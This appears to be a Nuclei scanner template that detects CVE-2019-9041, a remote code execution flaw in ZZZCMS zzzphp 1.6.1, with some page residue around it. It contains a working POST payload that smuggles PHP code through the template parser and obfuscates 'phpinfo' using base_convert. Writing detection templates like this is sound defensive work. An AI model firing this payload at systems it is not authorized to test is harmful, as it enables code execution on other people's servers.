47 lines
1.2 KiB
YAML
47 lines
1.2 KiB
YAML
id: CVE-2019-9041
|
|
|
|
info:
|
|
name: ZZZCMS 1.6.1 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: high
|
|
description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/46454/
|
|
- http://www.iwantacve.cn/index.php/archives/118/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9041
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2019-9041
|
|
cwe-id: CWE-917
|
|
epss-score: 0.01127
|
|
cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zzzcms
|
|
product: zzzphp
|
|
tags: cve,cve2019,zzzcms,rce,edb
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/search/"
|
|
|
|
body: |
|
|
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "phpinfo"
|
|
- "PHP Version"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|